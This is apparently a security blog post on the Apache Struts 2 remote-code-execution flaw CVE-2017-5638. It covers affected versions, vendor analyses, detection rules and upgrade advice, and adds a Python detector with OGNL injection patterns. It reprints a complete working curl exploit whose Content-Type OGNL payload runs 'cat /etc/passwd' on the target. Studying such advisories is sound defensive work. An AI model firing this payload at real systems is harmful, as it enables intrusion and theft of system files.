Upgrade now, some attacks are already in progress!

Another serious vulnerability was discovered in Apache Struts 2.

Affected versions

Apache Struts 2.3.5–2.3.31
Apache Struts 2.5–2.5.10

The vulnerability

The vulnerability (CVE-2017-5638), first reported by the security researcher Nike Zheng, is a remote code execution bug in the Jakarta Multipart parser of Apache Struts, as described in this security advisory:

It is possible to perform a RCE attack with a malicious Content-Type value. If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.

The researchers have also seen malicious attacks which turn off firewall processes on the target and drop payloads:

“The payloads have varied but include an IRC bouncer, a DoS bot, and a sample related to the bill gates botnet”.

Technical analyses were released by the major security firms:

Cisco’s Talos

Talos has also released Snort rules that detect exploitation attempts of the vulnerability (SIDs 41818 and 41819): https://snort.org/advisories/talos-rules-2017-03-07-3-7-2017.

Talos suggests upgrading ASAP, because the researchers found

“a high number of exploitation events. The majority of the exploitation attempts seem to be leveraging a publicly released proof of concept that is being used to run various commands”.

The proof of concept was released by Qualys.

Qualys

https://threatprotect.qualys.com/2017/03/08/apache-struts-jakarta-multipart-parser-remote-code-execution-vulnerability/

Qualys released a proof of concept that checks for the vulnerability using curl:

For our analysis, we have used the below curl command to replicate the issue:

curl -i -v -s -k -X $'GET' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0' -H $'Content-Type:%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}' $'http://10.10.36.22:8080/struts2-blank/example/HelloWorld.action'

It is important to note that the presence of vulnerable code is enough to exploit the vulnerability. The web application doesn’t necessarily need to implement file upload functionality to be exploitable through this vulnerability.
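As an added defender-side example (not code from the original post, from Qualys or from Talos), the following Python check classifies a Content-Type header value as a legitimate media type, a malformed one (the kind that hits the error-message path the advisory describes), or one carrying OGNL markers like those in the public PoC. The header values are constructed samples.

```python
import re

# Constructed sample Content-Type values, e.g. as recorded by a reverse proxy.
# The third mirrors the shape of the public PoC: an OGNL expression in %{...}
# that tries to replace the OGNL member-access (sandbox) object.
SAMPLE_HEADERS = [
    "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
    "application/x-www-form-urlencoded",
    "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    "(#_memberAccess?(#_memberAccess=#dm):(#context.setMemberAccess(#dm)))}",
    "application/json",
    "multipart/form-data; boundary",        # parameter without a value: malformed
]

# Indicators of an OGNL expression inside a header value. A legitimate
# Content-Type (type/subtype plus ;name=value parameters) never contains them.
OGNL_MARKERS = (
    re.compile(r"%\{"),                       # OGNL evaluation wrapper
    re.compile(r"@ognl\.OgnlContext@"),       # static access to the OGNL context
    re.compile(r"#_memberAccess"),            # member-access (sandbox) override
    re.compile(r"java\.lang\.(Runtime|ProcessBuilder)"),  # process execution
)

# RFC 7230 token characters; used to accept only syntactically valid media
# types with optional parameters (quoted or token values).
TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
VALID_CONTENT_TYPE = re.compile(
    rf"^{TOKEN}/{TOKEN}(\s*;\s*{TOKEN}\s*=\s*(?:{TOKEN}|\"[^\"]*\"))*\s*$"
)


def classify_content_type(value: str) -> str:
    """Return 'ognl' if the value carries OGNL injection markers,
    'malformed' if it is not a syntactically valid media type, else 'ok'."""
    if any(p.search(value) for p in OGNL_MARKERS):
        return "ognl"
    if not VALID_CONTENT_TYPE.match(value.strip()):
        return "malformed"
    return "ok"


def scan(headers):
    """Classify each header value; returns (truncated value, verdict) pairs."""
    return [(h[:40], classify_content_type(h)) for h in headers]


if __name__ == "__main__":
    for snippet, verdict in scan(SAMPLE_HEADERS):
        print(f"{verdict:9s} {snippet}")
```

Alerting on the 'malformed' class as well as 'ognl' is useful, since the advisory notes that any invalid Content-Type reaches the error-handling code where the expression is evaluated.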

A Python script to check for the vulnerability is also available in the Rapid7 GitHub repository:

https://github.com/rapid7/metasploit-framework/issues/8064

https://gist.github.com/andreafortuna/23792e573fe6f72c843f8f9598db0325

Remediations?

This vulnerability has been fixed in Struts 2.3.32 and 2.5.10.1, so upgrade ASAP!